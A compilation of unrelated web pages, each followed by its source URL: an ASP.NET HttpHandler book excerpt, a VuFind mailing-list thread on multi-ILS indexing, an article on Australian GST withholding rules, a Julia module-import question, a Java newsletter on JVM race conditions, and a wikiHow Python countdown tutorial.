To write an HttpHandler, you create a class that implements the IHttpHandler interface. All of the handlers in Listing 8.1 do this. You might recall from Chapter 2, "Classes: The Code Behind the Objects," that an interface is used to ensure that a well-known means of communicating with some other code is available. For ASP.NET to communicate with an HttpHandler, the handler must have a couple of members defined by the interface. Listing 8.2 shows the basic interface.

C#

```csharp
public class MyHttpHandler : IHttpHandler
{
    public void ProcessRequest(HttpContext context)
    {
        // do something here
    }

    public bool IsReusable
    {
        get { return true; }
    }
}
```

VB.NET

```vb
Public Class MyHttpHandler
    Implements IHttpHandler

    Public Sub ProcessRequest(context As HttpContext) _
        Implements IHttpHandler.ProcessRequest
        ' do something here
    End Sub

    Public ReadOnly Property IsReusable() As Boolean _
        Implements IHttpHandler.IsReusable
        Get
            Return True
        End Get
    End Property
End Class
```

The ProcessRequest() method is where we do work in response to the request. ASP.NET passes in a reference to the HttpContext object associated with the request. You'll notice in Visual Studio that as soon as you type a period following the context parameter, IntelliSense will show you properties that correspond to all the familiar objects you might use in a page (see Figure). You can get information about the request via the Request property, and you can send almost any kind of data you want back down the pipe with the Response property. This is very powerful because you can essentially do anything. If you wanted to divert .aspx file requests to a handler of your own (and had way too much time on your hands), you could implement the entire ASP.NET page factory yourself! The IsReusable property is the other member you'll have to implement in your HttpHandler. It's there to tell ASP.NET whether the instance of the handler can be reused from one request to the next, or whether it should create a new instance each time.
Generally it's best for this property to return true, especially if the HttpHandler will service many requests. However, if some user-specific action is occurring in the handler that you don't want the next user to use, you should cause the property to return false.

In order for ASP.NET to process any request at all, it must receive the request via IIS. This was covered in Chapter 6. After ASP.NET gets the request, it must designate which HttpHandler will process the request. Listing 8.1 showed the defaults listed in the machine.config file. Listing 8.3 shows the relevant parts of a web.config file to add the HttpHandler to your application.

```xml
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
  <system.web>
    <httpHandlers>
      <add verb="*" path="*.jpg" type="MyClass, MyDll" />
    </httpHandlers>
  </system.web>
</configuration>
```

The element that does the actual work is the <add /> element. The verb attribute indicates the types of requests that are covered (GET or POST), and you can use an asterisk as a wildcard. The path attribute describes the file path of the request. In this example we're using a wildcard with ".jpg" to indicate that we want to handle all requests for .jpg files, but you could just as easily specify anything else, such as "mypage.aspx." The <add /> elements are considered in the order that they appear, so a request that fits the path of two elements will be serviced by the class in the last entry. Finally, the type attribute indicates the name of the class implementing IHttpHandler and the assembly name in which it resides, looking in the /bin folder. Keep in mind that the class name should be fully qualified, meaning that the namespace should be
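Because later <add /> elements win when two entries match the same path, a more specific handler can be layered over a general one simply by registering it afterward. A hypothetical sketch of that ordering rule (both class names and the assembly name are invented for illustration):

```xml
<httpHandlers>
  <!-- Both entries match a request for any .jpg file; -->
  <!-- the request is serviced by the class in the last entry. -->
  <add verb="*" path="*.jpg" type="BasicJpegHandler, MyDll" />
  <add verb="*" path="*.jpg" type="WatermarkJpegHandler, MyDll" />
</httpHandlers>
```

Here every .jpg request would reach WatermarkJpegHandler, because its entry appears last.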
http://codeidol.com/community/dotnet/handling-file-types-of-your-own/16968/
I was able to get a simple 2-ILS system working at Auburn on our dev server. Here's what I did.

*. Set up a solrmarc import that prepends an ILS-specific prefix to each record. You can get something working quickly by modifying the 'id' rule in the solrmarc marc.properties to:

```
id = script(customId.bsh),getCustomId("PREFIX")
```

where customId.bsh has:

```java
import org.marc4j.marc.Record;
import org.marc4j.marc.ControlField;

/**
 * Generate a custom id as prefix + 001
 */
public String getCustomId(Record record, String prefix) {
    return prefix
        + ((ControlField) record.getVariableField("001")).getData();
}
```

*. I wrote a MultiVoyager.php driver that reads MultiVoyager.ini and maintains a list of Voyager.php driver instances. I attached a copy of MultiVoyager.ini, or you can clone a copy out of our Mercurial repository: The MultiVoyager.ini file maps a prefix to an ILS config - an example follows. The "EMPTY" keyword indicates no prefix. This example works for records that look like 12345 (no prefix) and AUM12345 (AUM prefix).

MultiVoyager.ini:

```ini
[Catalog]
configList = EMPTY,AUM
defaultDriver = EMPTY

[EMPTY]
host = bla
port = 1521
service = VGER
user = bla
password = bla
database = bla
pwebrecon =

[AUM]
host = bla
port = 1521
service = VGER
user = bla
password = bla
database = bla
pwebrecon =
```

*. I had to patch a few other php lines here and there too to get the ajax load of holding status working right, modify Voyager.php to accept a config in the constructor rather than load Voyager.ini, ... - stuff like that. The complete patch is here, but our vufind code is pretty far out of date compared to vufind.org:

Hope this code works for you - let me know how it goes.

Cheers,
Reuben

-----Original Message-----
From: Reuben Pasquini [mailto:rdp0004@...]
Sent: Monday, October 18, 2010 1:20 PM
To: Harmon, Kelly; vufind-general@...; Osullivan L.
Subject: Re: [VuFind-General] Anyone merging more than one Voyager Database into VuFind?

At Auburn we currently only index one Voyager database, but we also OAI harvest other collections. An easy trick is to just prepend a unique prefix before the normal bib-id. For example - we have 'SLEDGE143' and '143' records. I think you'll have to hack at least 2 things to get this scheme to work:

*. Modify Drivers/Voyager.php to manage connections to multiple Oracle servers, and choose a connection based on the id-prefix.

*. Modify the solrmarc vufind.properties file, and replace `id = 001, first` with something like `id = my001WithPrefixFunction` ... something like that.

I'd like to do something like this myself, but it keeps falling off the end of my TODO list. Let me know if you need help implementing this, and I'll set aside a day or two to give it a try.

Cheers,
Reuben

>>> "Osullivan L." <L.Osullivan@...> 10/18/2010 10:56 AM >>>

Hi Kelly,

Here at SWWHEP we don't use two Voyager instances but we do use three different databases. We have a marc merge script which creates a unique id for each merged record and a system id in the solr index where we store the individual bib ids. Have a look at the marc records at - we have used the 969 field to store the bib ids. If you think this may be of use to you, let me know and we can discuss things further.

Kind Regards,
Luke O'Sullivan

From: Harmon, Kelly [mailto:Kelly.Harmon@...]
Sent: 18 October 2010 16:44
To: vufind-general@...
Subject: [VuFind-General] Anyone merging more than one Voyager Database into VuFind?

We're building our index from two separate Voyager databases. The problem, however, is that many of the same bib IDs are being used in both DBs, so when we create the index, some records are being overwritten. We've done some marc-field juggling to get this to work, but are realizing that if we want to use all Vufind functionality, this isn't the way to go. Is anyone else doing this? What solutions have you employed? Thank you.
Kelly

Kelly A. Harmon
Webmaster, National Agricultural Library
10300 Baltimore Avenue
Beltsville, MD 20705
(301) 504-5788

I've done something very similar and even wrote my own multi-ils multi-database driver for the Keystone Library Network. Along with the suggestions given above, I've had Demian commit a modified import script which allows you to specify the import properties file for this very purpose. Simply create an import properties file for every ils/database/institution, and have each one alter the id field to prepend the identifier that everyone's been talking about using the bsh script. Then, when you're importing your marc file, simply run `import.sh -p ./import/this_inst.properties path/to/first_marc.marc` and then `import.sh -p ./import/other_inst.properties path/to/other_marc.marc`. Unfortunately I no longer work for KLN, and don't have access to the original code, but my successor may come along one day and chime in, as I told him to before leaving.

-Casey Boone, former KLN/PASSHE programmer
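The prefix scheme the thread converges on (prepend an ILS-specific prefix at import time, then pick a driver config from the id's prefix at lookup time) can be sketched in plain Java. This is an illustrative standalone sketch, not VuFind's actual PHP/solrmarc API; the class and method names are invented:

```java
import java.util.LinkedHashMap;
import java.util.Map;

public class PrefixRouter {
    // Maps an id prefix to the name of an ILS config section,
    // mirroring MultiVoyager.ini; "" plays the role of the EMPTY keyword.
    private final Map<String, String> prefixToConfig = new LinkedHashMap<>();

    public PrefixRouter() {
        prefixToConfig.put("AUM", "AUM");
        prefixToConfig.put("", "EMPTY"); // default: no prefix
    }

    /** Prepend an ILS-specific prefix to a raw bib id, as the bsh script does. */
    public static String customId(String prefix, String bibId) {
        return prefix + bibId;
    }

    /** Choose a config section based on a matching id prefix. */
    public String configFor(String id) {
        for (Map.Entry<String, String> e : prefixToConfig.entrySet()) {
            if (!e.getKey().isEmpty() && id.startsWith(e.getKey())) {
                return e.getValue();
            }
        }
        return prefixToConfig.get(""); // fall back to the EMPTY (no-prefix) config
    }

    public static void main(String[] args) {
        PrefixRouter router = new PrefixRouter();
        System.out.println(customId("AUM", "12345"));     // AUM12345
        System.out.println(router.configFor("AUM12345")); // AUM
        System.out.println(router.configFor("12345"));    // EMPTY
    }
}
```

A MultiVoyager-style driver would then hold one connection per config section and delegate each lookup to the connection that `configFor` selects.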
https://sourceforge.net/p/vufind/mailman/message/26523919/
Treasury has released consultation draft legislation on GST for sales of "new residential premises" and "potential residential land" (subdivided residential lots). As explained in detail further below, once enacted, the new laws will require purchasers of new residential premises and potential residential land to withhold 1/11th of the purchase price as GST (including for margin scheme sales). That withheld amount must be paid to the ATO on settlement. The consultation period is only two weeks, with any comments required to be provided to Treasury by Monday, 20 November 2017.

What is driving this change?

The Government wants to prevent the loss of GST revenue to "phoenix" operators. At its most simple, a phoenix arrangement involves a new company that is established to undertake a specific residential development project. During the development phase the company will claim GST refunds for land purchase and development costs. On completion the company will sell the new residential premises or residential lots, which is a taxable supply and subject to GST. However, in a phoenix arrangement the company will not remit the GST to the ATO and instead distributes all proceeds to another company or related parties. By the time the ATO issues assessments for the unpaid GST, it is often too late. The company has no assets and it may be in the process of being wound up. In the absence of the proposed reforms, the Budget Papers estimate lost GST from phoenix activities will be $660 million over the next three years. The new measures are intended to beat phoenix operators by requiring purchasers to withhold GST from the purchase price and to pay this amount directly to the ATO.

When will the new measures start?

The proposed start date is 1 July 2018. For contracts signed prior to that date, the new measures will not apply if the purchase price is paid before 1 July 2020. This effectively provides a two-year transition window for current off-the-plan sales.
It should be noted that all contracts which complete after 1 July 2020 will be caught, even if the contract is entered into before 1 July 2018. This will be relevant for off-the-plan sales that are not expected to complete for another 2.5 years or more.

Is there any exemption for developers with a good GST compliance history?

No. The current draft legislation applies to all developers selling new residential premises or potential residential land. It is arguable that developers with a good compliance history should be exempt from the withholding measures. One way to achieve this could be through the ATO issuing a GST "clearance certificate" to exempt developers. The clearance certificate could be provided to the purchaser ahead of settlement to make it clear that GST withholding does not apply.

Vendors must issue a notice to purchasers

The draft legislation requires vendors to issue a notice to purchasers at least 14 days prior to settlement advising whether the purchaser must withhold. If withholding is required, the notice must include details about the vendor (name and ABN), the amount to be withheld and the date the amount must be paid to the ATO. It is presently unclear whether a vendor must issue a notice in relation to any residential sale, or whether a notice is only required for a taxable supply of new residential premises. The explanatory memorandum suggests that all vendors of residential premises must issue a notice, but this is not reflected in the wording of the relevant provisions in the draft legislation. It is expected that this will be clarified when the final legislation is released. Failure to issue the notice is a strict liability offence. The applicable penalty is 100 penalty units (at $210 per unit = $21,000). This applies per notice (i.e. per contract). It is a defence if the vendor honestly and reasonably believed the property being sold was not a "new residential premises".
It is expected that most developers will look to include the required notice in the contract for sale.

Purchasers must issue a notice to the ATO twice

The draft legislation states that if a purchaser is required to withhold GST, the ATO must be notified of this at least five days prior to the withholding payment (i.e. at least five days prior to settlement). The ATO must also be notified a second time on the settlement date when the withheld amount is paid. Ultimately it will be a purchaser's responsibility to determine if withholding applies, and if so, the amount to be withheld. However, if the purchaser does not receive any notice advising that withholding applies, or relies on a notice stating that withholding is not required, this will be a factor that is taken into account in determining whether any penalties should apply for failure to make the required notifications.

How does the withholding work for margin scheme sales?

A developer may have a reduced GST liability if the "margin scheme" applies to the sale of new residential premises or a residential lot. Regardless, the purchaser will be required to withhold and remit 1/11th of the purchase price to the ATO. This obviates the need for the developer to disclose its margin to the purchaser. Of course, this also means that GST will be overpaid on margin scheme sales. This will have a cash flow impact on developers. Developers will need to recover the overpayment directly from the ATO. For developers that account for GST on a monthly basis, this will be done via the developer's next GST return (BAS). For developers that have quarterly tax periods, the developer will have the option to apply to the ATO for a refund prior to lodging their next quarterly GST return. This proposed refund mechanism is new and an attempt to reduce the cash flow impact of the proposed measures.

Will the vendor still have to report a GST liability on the sale?
Yes, under the proposed arrangements the developer will still be required to report a GST liability in its GST return (BAS) for the relevant sale. However, the developer will be entitled to a credit for the GST that has been withheld and remitted to the ATO on the developer's behalf. Excluding any minor discrepancies (for example, in relation to settlement adjustments), the GST liability and credit should generally net out to nil in the same GST return.

How does the withholding work for instalment contracts?

Where withholding applies, the purchaser's withholding obligation is triggered on payment of the first part of the purchase price, excluding the deposit. Where the purchase price is payable in instalments, this means the GST on the total purchase price must be withheld from the first instalment. For example, assume a property is sold for $11 million, including GST of $1 million. The purchaser will pay a deposit of $1 million on exchange, with the balance of the purchase price being paid in two instalments of $5 million six months apart. The payment of the deposit will not trigger any GST withholding. However, the payment of the first instalment of $5 million will trigger GST withholding on the total purchase price. That is, the purchaser will be required to withhold $1 million from the $5 million instalment payment. No further GST would need to be withheld when the deposit is released and the final instalment paid.

Does the withholding apply to the contract price or the adjusted purchase price?

It is common for the contract price to be adjusted on settlement to take into account amounts such as land tax, water rates and council rates. Under the draft legislation, the withholding will be applied to the adjusted purchase price. This may raise practical difficulties if the total of all settlement adjustments is not known when the vendor is required to issue a notice to the purchaser (at least 14 days prior to settlement).
This is an issue that will likely be raised in consultation, and the requirements in the final legislation may be different.

What is the impact on banks and other property financiers?

Secured lenders who finance residential developments take security over the property and rank ahead of unsecured creditors, including the ATO. If a development project is underperforming, secured creditors may be entitled to all of the proceeds received by the developer, including the GST component of the purchase price. If the proposed measures are enacted, the ATO will instead receive GST payments ahead of secured creditors. To illustrate, assume a developer sells a new apartment for $550,000, including GST of $50,000. Presently a bank may be entitled to 100% of those proceeds, being the full $550,000. If the developer has no other funds, the ATO may miss out on the GST. Under the proposed measures the $50,000 of GST will be paid by the purchaser directly to the ATO. The developer will only receive the net proceeds of $500,000. Those net proceeds may be all that the bank can recover from the developer. Accordingly it would be the bank, not the ATO, who misses out on the $50,000 of GST in this example.

What about property development agreements (PDAs)?

The draft legislation includes provisions which are intended to provide some transitional relief in the context of property development agreements (PDAs). PDAs are arrangements whereby a landowner pays a developer for undertaking a residential development on the landowner's property. The developer is paid from the proceeds that the landowner receives on the sale of the new premises / lots (as the case may be). Typically PDAs involve complex payment distribution arrangements (often referred to as a "payment waterfall"). Ideally PDAs entered into prior to 1 July 2018 (or some earlier date) would not be subject to the proposed measures, so that any existing payment waterfall arrangements are not disturbed. The proposed transition measures for PDAs do not currently go this far.
Vendors will want certainty that any withheld GST has in fact been remitted to the ATO by the purchaser. Conversely, purchasers will want the new arrangements to occur painlessly, with the funds simply flowing to the required parties (developer and ATO) on settlement. These are additional reasons why electronic settlement solutions such as PEXA will be increasingly important going forward.

Consultation ongoing

As noted above, submissions can be made to Treasury on the reform proposal through to Monday, 20 November 2017. Interested parties, including the Property Council of Australia, are expected to make submissions on a number of key issues, including continuing to push for exemptions for developers with an excellent GST compliance history. Once the legislation is finalised, developers will need to ensure that they have contracts and systems in place to ensure compliance from 1 July 2018.
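As a cross-check of the arithmetic in the worked examples above, here is a small sketch of the 1/11th withholding calculation. The class and method names are invented for illustration, and real settlement systems would use exact decimal types rather than double:

```java
public class GstWithholding {
    /** GST withheld is 1/11th of the GST-inclusive price. */
    static double withheld(double inclusivePrice) {
        return inclusivePrice / 11.0;
    }

    public static void main(String[] args) {
        // Instalment example from the article: $11m price, GST inclusive.
        double price = 11_000_000;
        double deposit = 1_000_000;       // paid on exchange: no withholding
        double firstInstalment = 5_000_000;

        // The full GST is withheld from the first instalment.
        double gst = withheld(price);
        System.out.println("GST withheld: " + gst);
        System.out.println("Vendor receives from first instalment: "
            + (firstInstalment - gst));
        System.out.println("Deposit (no withholding): " + deposit);

        // Bank example: $550,000 apartment, $50,000 GST.
        System.out.println("Apartment GST: " + withheld(550_000));
    }
}
```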
https://www.lexology.com/library/detail.aspx?g=522be7b3-7623-443e-a522-782552f35811
My code is divided into several files, say A.jl, B.jl, C.jl, each of which defines a single module, say A, B, C. Inside C.jl there are declarations like this:

```julia
import A.myfunction1
import B.myfunction2
```

In 0.6.2, I was able in the REPL to issue instructions in this order:

```julia
include("A.jl")
include("B.jl")
include("C.jl")
```

and then my code would run. In 0.7-DEV, module C can't find B.myfunction2. It appears that C.jl now must qualify the import statements with Main:

```julia
import Main.A.myfunction1
import Main.B.myfunction2
```

in order to support this workflow. Is this correct? Why the change? I would rather not explicitly refer to Main in the source files, since I might reorganize my code later to look for the modules elsewhere, e.g., using the Package mechanism.
https://discourse.julialang.org/t/loading-modules-at-the-repl-in-0-7-is-it-different/9190
The Java Specialists' Newsletter, Issue 234, 2015-11-20
Category: Concurrency. Java version: Java 8

Welcome to the 234th edition of The Java(tm) Specialists' Newsletter, written during various flights at 30,000 feet. Last weekend I was in Graz, Austria, in between two courses. On the Saturday I decided to take advantage of the stunning weather to head up the local Schoeckl mountain. Prior to starting, I asked my friend Holger whether a lot of people were walking up there. "Oh yes, half of Graz, don't worry." I did not want to go hiking in remote areas, lest something happen and I get into trouble. Holger kindly sent me a nice route I could follow on Endomondo. All keen, I set out early on Saturday morning, hoping to still get some parking at the Schoecklkreuz. Unfortunately I had forgotten to load the route into Endomondo prior to leaving the hotel, which I discovered when I parked my car. I thus had to follow the sign posts along the way. The first bit was OK, but then I got to a place where I wasn't quite sure. There were these red circles on the one sign, but I didn't notice them on the way up. The path looked OK, so I headed up. (I found out at the summit that a red circle means "Mittelschwierige Bergwege. Ausdauer und Trittsicherheit erforderlich" - moderately difficult mountain paths, stamina and sure-footedness required.) A bit later, I saw some Austrians walk up the same route behind me, so I was fairly confident that I had made the right call. The path crossed a small road and then kept on going straight up through the forest. It did seem odd to me how many pine needles were lying on the path. Straight up did look like the shortest distance to get to the summit. So I trudged on. After what felt like a very long time, I checked my map and discovered that I had only gone up 1/3 of the way! And of course the Austrians who were behind me had decided to go along the small road instead of a goat path up the mountain. Down didn't sit well with me. First off there was my pride.
Secondly walking down a treacherous path is more dangerous than up. So I kept on going. Fortunately when I checked the map a second time I was very close to the top. It was a very interesting little walk up the hill actually and I don't regret it, but it was a bit foolish. The pine needles did tell me that. It all reminded me of the poem "The Road Not Taken" by Robert Frost, where he ends with: "Two roads diverged in a wood, and I - I took the one less traveled by, and that has made all the difference." NEW: Please see our new "Extreme Java" course, combining concurrency, a little bit of performance and Java 8. Extreme Java - Concurrency & Performance for Java 8. In May this year, my esteemed friend and colleague Maurice Naftalin and I headed off to Israel to present my Extreme Java - Concurrency and Performance for Java 8 to a bunch of smart Intel engineers. As the author of the best-selling book on Generics and Collections, Maurice has a great command of the English language. This, coupled with his vast experience in software engineering, is extremely useful in helping answer some of the tougher questions. We usually tag-team each other, with me preferring to answer questions in my native language, Java. I was flattered that Intel would invite me to teach them. They also enjoyed the course a lot, with my favourite unsolicited comment being: "The three days that we've spent together were amazing. Java is our bread and butter and yet we've learnt many new things and techniques which I'm sure that will help us in the future." - Noam A. During the course, we got to know all the students quite well, so when I received an email from Dudu Amar in August, telling me that String.compareTo() sometimes gave incorrect results, I knew that I should take his claims seriously. 
He had found an issue in production where someone was comparing Strings with .compareTo() to determine equality, rather than .equals(), and it would occasionally spit out 0 when they were actually different. Strangely, the failures only happened on one of his machines. They had lots of other similar machines in production. We did a binary search through Java versions to try and figure out if this failure had been introduced at some specific time. After some testing, Dudu found that it did not happen in Java 1.7.0_25-64, but it did from 1.7.0_40-64 onwards. It also failed in all Java 8 versions he tried. Usually knowing the exact version that an error starts appearing helps narrow down which change might have caused the error. Java has special intrinsic functions for Strings, including compareTo(). Thus the code you see in the String.java file is not what will really be executed. Sadly, it being Intel with a huge amount of hardware to play with, someone went and upgraded all the CPUs, with the result that Dudu's program no longer fails. We are thus looking for someone, anyone, who can make this program fail on their machine, so that we can keep on trying to figure out what caused it. Please contact me if this fails on your machine. We would like to try some additional tests to narrow down the exact cause. 
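For reference, the invariant the production code relied on is part of String's contract: x.compareTo(y) returns 0 exactly when x.equals(y) is true. A minimal sketch of that contract, using values borrowed from the failing program below (on a correctly behaving JVM these checks must always agree):

```java
public class StringCompareContract {
    public static void main(String[] args) {
        String a = "java.util.Vector";
        String b = "short";
        // Different strings: both checks must say "not equal".
        System.out.println(a.equals(b));               // false
        System.out.println(a.compareTo(b) == 0);       // false
        // Identical content: both checks must say "equal".
        System.out.println("short".equals(b));         // true
        System.out.println("short".compareTo(b) == 0); // true
    }
}
```

Dudu's machine was producing runs where compareTo() returned 0 for strings that equals() correctly reported as different, which is exactly what this contract forbids.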
```java
import java.util.concurrent.*;

public class PXMLTag {
    public final String m_type;
    private static String[] m_primitiveTypes = {
        "java.lang.String", "boolean", "int", "long", "float", "short"};
    private static String[] m_allTypes = {
        "java.lang.String", "boolean", "int", "long", "float",
        "java.util.Vector", "java.util.Map", "short"};

    public PXMLTag(String type) {
        this.m_type = type;
    }

    public boolean isPrimitiveType() {
        for (int i = 0; i < m_primitiveTypes.length; i++) {
            String type = m_type;
            String primitiveType = m_primitiveTypes[i];
            if (type.compareTo(primitiveType) == 0
                && notReallyPrimitiveType(type)) {
                System.out.println("This odd case");
                System.out.println("type '" + type + "'");
                System.out.println("currentPrimitiveType '" + primitiveType + "'");
                System.out.println("They are equal? " + type.equals(primitiveType));
                System.out.println("They are compared " + type.compareTo(primitiveType));
                System.out.println("m_type '" + m_type + "'");
                System.out.println("m_primitiveType[i] '" + m_primitiveTypes[i] + "'");
                System.out.println("They are equal? "
                    + m_type.equals(m_primitiveTypes[i]));
                System.out.println("They are compared "
                    + m_type.compareTo(m_primitiveTypes[i]));
                return true;
            }
        }
        return false;
    }

    public static boolean notReallyPrimitiveType(String m_type) {
        return m_type.contains("Vector") || m_type.contains("Map");
    }

    public static String getRandomType() {
        return m_allTypes[
            ThreadLocalRandom.current().nextInt(m_allTypes.length)];
    }

    public static void main(String[] args) {
        int threads = 1;
        if (args.length == 1) {
            threads = Integer.parseInt(args[0]);
        }
        for (int i = 0; i < threads; i++) {
            Thread t = createThread();
            t.start();
        }
    }

    private static Thread createThread() {
        return new Thread(new Runnable() {
            @Override
            public void run() {
                while (true) {
                    PXMLTag tag = new PXMLTag(getRandomType());
                    if (tag.isPrimitiveType()
                        && notReallyPrimitiveType(tag.m_type)) {
                        System.out.println(tag.m_type + " not really primitive!");
                        System.exit(1);
                    }
                    try {
                        Thread.sleep(
                            ThreadLocalRandom.current().nextInt(100));
                    } catch (InterruptedException e) {
                        return;
                    }
                }
            }
        });
    }
}
```

The code failed even with just one thread, but it took longer than with 5 threads. Interestingly, we can turn off intrinsics of compareTo() in String with the VM parameter -XX:DisableIntrinsic=_compareTo. (Thanks to Aleksey Shipilev for that tip.) We tried that and the program did not fail. This was the first example of some very strange goings-on in Java code that could only be explained as a race condition between our code and the JVM. I know that shouldn't happen. But it certainly seems to. As I mentioned, I took Dudu's report seriously as he had attended my course and I knew that he was smart. I sometimes get slightly "less smart" requests from programmers who think it would be cool if I did their homework for them. My latest was a guy from South Africa asking if I wouldn't mind solving a programming task he had for a job interview!
Sometimes when I feel playful I do a Socrates - ask questions that force them to think about the exercise themselves. Usually my questions take more effort to answer than the original homework assignment. About a year ago someone sent me his homework assignment. He was studying computer science at some university in darkest Africa. His answer was so far off the mark that I gave him the following advice: "Programming is probably not the right career for you. If you struggled with that exercise, then it's not the right thing for you to be doing as a career. I think I would have been able to figure out that exercise when I was about 15 or 16 years old. Sorry for being harsh, but I don't want to get your hopes up." I expected to never hear from him again. I knew it was a cruel thing to say to someone who had told me: "help me actualize my dreams in programming". I was rather surprised when I received an email from him about six months later. He told me that even though he could've easily been offended, he chose not to and took my advice. Instead of programming, he changed his focus and is now a database administrator and absolutely loves his work. I would be useless as a db admin and I admire him for being so mature as to listen without getting angry. Well done, mate!

Back to race conditions between our code and the JVM :-) Another very smart ex-student of mine is Dr Wolfgang Laun. He sent me a code sample that he found on StackOverflow. This code started failing sporadically on the JVM from version 1.8.0_40 onwards. (Actually, isn't that a funny coincidence? Dudu's race condition happened after 1.7.0_40. Maybe 40 is to Java what the number 13 is to us?)
Before I show you the code (slightly modified from the original StackOverflow example), I would like to show just an excerpt that will make it clear that this simply should not fail:

```java
double array[] = new double[1];
// some code unrelated to array[]
array[0] = 1.0;
// some more code unrelated to array[]
if (array[0] != 1.0) { // could not possibly be true
    if (array[0] != 1.0) {
        // and we should definitely not get here either!
    } else {
        // I never saw the code get into this else statement
    }
}
```

Seeing the code above, it should be clear that if we have just set the array[0] element to 1.0, it would make no sense for it to be anything else but 1.0. In fact it might come back as 0.0!

```java
import java.util.*;

// based on
// java-8-odd-timing-memory-issue
public class OnStackReplacementRaceCondition {
    private static volatile boolean running = true;

    public static void main(String... args) {
        new Timer(true).schedule(new TimerTask() {
            public void run() {
                running = false;
            }
        }, 1000);
        double array[] = new double[1];
        Random r = new Random();
        while (running) {
            double someArray[] = new double[1];
            double someArray2[] = new double[2];
            for (int i = 0; i < someArray2.length; i++) {
                someArray2[i] = r.nextDouble();
            }
            // for whatever reason, using r.nextDouble() here doesn't
            // seem to show the problem, but the # you use doesn't seem
            // to matter either...
            someArray[0] = .45;
            array[0] = 1.0;
            // can use any double here instead of r.nextDouble()
            // or some double arithmetic instead of the new Double
            new Double(r.nextDouble());
            double actual;
            if ((actual = array[0]) != 1.0) {
                System.err.println(
                    "claims array[0] != 1.0....array[0] = "
                    + array[0] + ", was " + actual);
                if (array[0] != 1.0) {
                    System.err.println(
                        "claims array[0] still != 1.0...array[0] = "
                        + array[0]);
                } else {
                    System.err.println(
                        "claims array[0] now == 1.0...array[0] = "
                        + array[0]);
                }
                System.exit(1);
            } else if (r.nextBoolean()) {
                array = new double[1];
            }
        }
        System.out.println("All good");
    }
}
```

Output on all Java 8 versions from 1.8.0_40 to 1.8.0_72-ea, and also 1.9.0-ea, was sometimes:

```
claims array[0] != 1.0....array[0] = 1.0, was 0.0
claims array[0] now == 1.0...array[0] = 1.0
```

The most likely reason for this bug is a race condition between on-stack-replacement (OSR) and our code. OSR does a hot-swap of our method that is currently at the top of the stack with faster, more optimized code. OSR is usually not the fastest machine code. To get that, we need to exit completely from the method and come back in again. For example, consider this class OptimizingWithOSR:

```java
public class OptimizingWithOSR {
    public static void main(String... args) {
        long time = System.currentTimeMillis();
        double d = testOnce();
        System.out.println("d = " + d);
        time = System.currentTimeMillis() - time;
        System.out.println("time = " + time);
    }

    private static double testOnce() {
        double d = 0;
        for (int i = 0; i < 1_000_000_000; i++) {
            d += 0;
        }
        return d;
    }
}
```

When we run this code with -XX:+PrintCompilation, we see that our testOnce() method is compiled, but not main(). This makes sense, since we hardly execute any code in main(). It all happens in testOnce(), but only once.
Here is the output on my machine:

  84   73 %  3  OptimizingWithOSR::testOnce @ 4 (22 bytes)
  84   74    3  OptimizingWithOSR::testOnce (22 bytes)
  84   75 %  4  OptimizingWithOSR::testOnce @ 4 (22 bytes)
  86   73 %  3  OptimizingWithOSR::testOnce @ -2 (22 bytes)

The "%" means that it is doing on-stack replacement. Now in terms of performance, with the default -XX:+UseOnStackReplacement my code runs in about 850ms. If I turn it off with -XX:-UseOnStackReplacement, it runs in 11 seconds and we do not see testOnce() in the compilation output. It would be easy to jump to the conclusion that OSR is essential and that it would make all our code run gazillions of times faster. Nope. OSR will mostly make large monolithic code run a bit faster. Microbenchmarks, which are anyway unreliable at best, could also complete more quickly. But well-structured, well-factored code will not see much benefit. Thus if you are a good Java developer, you can safely turn it off in production without suffering any slowdown. I refactored the code a bit by breaking the long loop into three nested loops and then extracting each of the loops into separate methods:

public class OptimizingWithNormalHotspot {
  public static void main(String... args) {
    for (int i = 0; i < 10; i++) {
      test();
    }
  }

  private static void test() {
    long time = System.currentTimeMillis();
    double d = testManyTimes();
    System.out.println("d = " + d);
    time = System.currentTimeMillis() - time;
    System.out.println("time = " + time);
  }

  private static double testManyTimes() {
    double d = 0;
    for (int i = 0; i < 1_000; i++) {
      d = unrolledTwo(d);
    }
    return d;
  }

  private static double unrolledTwo(double d) {
    for (int j = 0; j < 1_000; j++) {
      d = unrolledOne(d);
    }
    return d;
  }

  private static double unrolledOne(double d) {
    for (int k = 0; k < 1_000; k++) {
      d = updateD(d);
    }
    return d;
  }

  private static double updateD(double d) {
    d += 0;
    return d;
  }
}

The code now runs in exactly the same time, whether I have OSR turned on or not.
Thus my recommendation would be to run production systems that are using Java 1.8.0_40 or later with OSR turned off, using the switch -XX:-UseOnStackReplacement. Of course you need to test that you don't have any performance degradation, but I would doubt it. Please let me know if you do. The other race condition I mentioned at the start of this newsletter is more nebulous. Please shout if you manage to reproduce it on your hardware. Interestingly, Azul's Zulu virtual machine has exactly the same bug. That is to be expected, as their intention is to produce a build identical to the OpenJDK, but with additional support. I went to see the Danube yesterday with my friend Frans Mahrl who lives in "Orth an der Donau". The level is the lowest it has been since they started recording about 400 years ago. A bit more and we'll be able to wade across. Kind regards from a sunny Crete, Heinz
http://www.javaspecialists.eu/archive/Issue234.html
How to Make a Countdown Program in Python

This article will show you how to create a simple countdown program with the programming language Python. Python is easy to learn, but this article is aimed at intermediate users, rather than beginners.

Steps

1. Open your text editor.
2. Go to the File menu and click on New Window, or just press Ctrl+N.
3. Import the 'time' module. To do this, type "import time". This will import the time module; we'll use time.sleep() to pause for one second between numbers.
4. Use the 'def' keyword to define a countdown function. Give the function a name of your choice. This article will be using 'countdown', so the line would be "def countdown(t):". Remember to indent the lines that follow the colon by four spaces.
5. Write a 'while' loop to start your countdown. Type in the code "while t > 0:". While the variable t is greater than zero, the program will perform the loop body:

    print(t)
    t = t - 1

The number will be decremented each time the loop completes a cycle.
6. Add the finishing touches. Type in the following code, indented inside the loop, to print out 'BLAST OFF!' when the countdown reaches zero:

    if t == 0:
        print('BLAST OFF!')

7. Add the number you want to start the countdown from. Call the function 'countdown' and, in parentheses, enter the number you want. For example, if you want a 50 second countdown, your code should be "countdown(50)".
8. Check your finished code. It should look like this:

import time

def countdown(t):
    while t > 0:
        print(t)
        t = t - 1
        time.sleep(1)  # pause for one second between numbers
        if t == 0:
            print('BLAST OFF!')

countdown(50)

Community Q&A

Q: I keep getting the following error: "expected an indented block." What have I done wrong?
A (wikiHow Contributor): You need to indent the block that follows a colon, for example with four spaces or the Tab key. So if you were writing an 'if' statement, you would do:

if a == b:
    print("Indentation is the space before print")
http://www.wikihow.com/Make-a-Countdown-Program-in-Python
